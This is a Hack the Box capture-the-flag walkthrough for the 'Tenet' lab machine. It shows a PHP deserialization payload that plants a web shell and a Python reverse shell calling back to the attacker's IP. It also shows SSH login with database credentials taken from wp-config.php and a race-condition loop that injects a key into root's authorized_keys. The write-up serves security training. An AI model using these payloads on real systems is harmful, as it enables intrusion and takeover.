Hack the Box - Tenet

This is my first writeup using markdown so bear with me. The Tenet box is a medium difficulty rated box which involves an Apache web server, Wordpress and a good review of PHP source code and ssh-key exploitation.

Skills used

• Enumeration
• PHP
• Bash
• SSH keys

Lessons Learned

• insecure deserialization
• Exploitation of a race condition in using a bash script

Enumeration / Reconnaisance

Nmap

Begin with doing a nmap scan.

kali@kali:~/Documents/HTB/tenet$ nmap -p- -n -Pn 10.10.10.223 -v 

Nmap scan report for 10.10.10.223
Host is up (0.16s latency).
Not shown: 65306 closed ports, 227 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open 

You will end up with the Apache2 Ubuntu default page.

Do a gobuster on the site to enumerate possible webpages:

kali@kali:~/Documents/HTB/tenet$ gobuster dir -u http://10.10.10.223 -w /usr/share/wordlists/dirb/common.txt


Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url:                     http://10.10.10.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s

/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 10918]
/server-status        (Status: 403) [Size: 277]  
/wordpress            (Status: 301) [Size: 316] [-http://10.10.10.223/wordpress/]
2021/06/16 23:38:43 Finished

Then add tenet.htb to the /etc/hosts file.

Click on the Migration blog entry and it will give you something interesting

Then you got Neil complaining about removing the sator.php and the backup file. This gives us a clue:

Now visit http://10.10.10.223/sator.php and it will give you the following on the webpage:

[+] Grabbing users from text file
[] Database updated

Now visit http://10.10.10.223/sator.php.bak and it will give you the following:

<?php
class DatabaseExport
{
public $user_file = 'users.txt';
public $data = '';
public function update_db()
{
    echo '[+] Grabbing users from text file <br>';
    $this-> data = 'Success';
}
public function __destruct()
{
    file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
    echo '[] Database updated <br>';
//  echo 'Gotta get this working properly...';
}
}
$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);
$app = new DatabaseExport;
$app -> update_db();
?>

The code above with the class DatabaseExport uses the __destruct()_function which creates a file called users.txt with the user defined data. It is read from the arepo parameter but it is unserialized then it updates the database.

add the following into a file named generate.php

<?php
class DatabaseExport
{
    public $user_file='attack.php';
    public $data = '<?php system($_GET["cmd"]);?>';
}
$payload = new DatabaseExport;
echo (serialize($payload));
?>

Run the following command:

kali@kali:~/Documents/HTB/tenet$ php generate.php 

O:14:"DatabaseExport":2:{s:9:"user_file";s:10:"attack.php";s:4:"data";s:29:"<?php system($_GET["cmd"]);?>";}

Then copy/paste the above payload with the following command:

http://10.10.10.223/sator.php?arepo=O:14:%22DatabaseExport%22:2:{s:9:%22user_file%22;s:10:%22attack.php%22;s:4:%22data%22;s:29:%22%3C?php%20system($_GET[%22cmd%22]);?%3E%22;}

Then you will receive the following:

[+] Grabbing users from text file
[] Database updated
[] Database updated 

Now you can have command execution as www-data (output edited for brevity)

kali@kali:~/Documents/HTB/tenet$ wget -O - http://10.10.10.223/attack.php?cmd=id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

Let's see if it has python3

kali@kali:~/Documents/HTB/tenet$ wget -O - http://10.10.10.223/attack.php?cmd=which%20python3
    /usr/bin/python3

It does, now you can run it to gain a foothold. Start a netcat listener:

kali@kali:~/Documents/HTB/tenet$ nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

Send your payload: (Edit your return IP address)

http://10.10.10.223/attack.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.52",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Receive your shell:

kali@kali:~/Documents/HTB/tenet$ nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.223.
Ncat: Connection from 10.10.10.223:11900.
bash: cannot set terminal process group (1533): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tenet:/var/www/html$ 

Privilege Escalation to Neil

A common wordpress vulnerability is having the wordpress credentials stored in its configuration file, so that is where we will look:

www-data@tenet:/var/www/html$ cat /var/www/html/wordpress/wp-config.php

File output cut for brevity, the user/password is located in the config file:

/** MySQL database username */
define( 'DB_USER', 'neil' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );

Since SSH is an open service, it is possible to use these stolen creds...

kali@kali:~/Documents/HTB/tenet$ ssh [email protected]

neil@tenet:~$ id
uid=1001(neil) gid=1001(neil) groups=1001(neil)

Privilege Escalation to Root

Check the sudo -l and found the following:

neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User neil may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh

So the privilege escalation will go through the enableSSH.sh

This part of the script will enable the race condition. All you need to so is sneak your own authorized key into /tmp/ssh-XXXXXXXX

addKey() {
   tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
   (umask 110; touch $tmpName)
   /bin/echo $key >>$tmpName
   checkFile $tmpName
   /bin/cat $tmpName >>/root/.ssh/authorized_keys
   /bin/rm $tmpName

Create a public/private key, use the following command to sneak your authorized key into the /tmp directory:

while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLDFARh+c79YUb2F2zglB+ExAhJ2bGVzjtePzG24zsXEx5T51Wn6G+118xfLFAK1rnmUWPHBrnXoOvgceRB4i1MpjnSuZpSBxB+q7WUgTYDoYe0qG6iU3kZbT1cGp2ultqbS77R+iB2xO73SCOtiWQf4lgXl+FXOorC73ztEmj/jCDcQUZHl1sSscfhSz0U60EAjjd25rExFHqL0q89CpU9C1x+vD2QH1gzELrDg9LGlPXhVo1qVjEy1q3DnU7ut/GjYhs3Rne3ILeTLOkQHI2q6U4TOhluHf4OUswh8CZ2F4FbP6TzIqNcENYK0XJeSW16cQhuaBG+zhPUlgS3E31Es3GQ7bXJX7bXaE3cNV7meF3+pUBg/H8mEm+EiIRCQGLNTwGgcLGDXXOGq2qyrMwqc9+l92/gduIsaV4w8r7vHosODqOS6L6WVFNHYC/XhRZyIj/fRj6ftSW+UT5CsnozuFaLBTj4oLHWZLJk/kLEk/IC+1oZ8NTfK4Roqsj9Vs= kali@kali" | tee /tmp/ssh* > /dev/null;done

Open up another SSH shell w/neil and run sudo /usr/local/bin/enableSSH.sh

neil@tenet:~$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!

Once you got the script going (it will run in an endless loop), keep trying to login w/the private key w/root. You'll eventually succeed.

kali@kali:~/Documents/HTB/tenet$ ssh -i id_rsa [email protected]
root@tenet:~# id
uid=0(root) gid=0(root) groups=0(root)
root@tenet:~#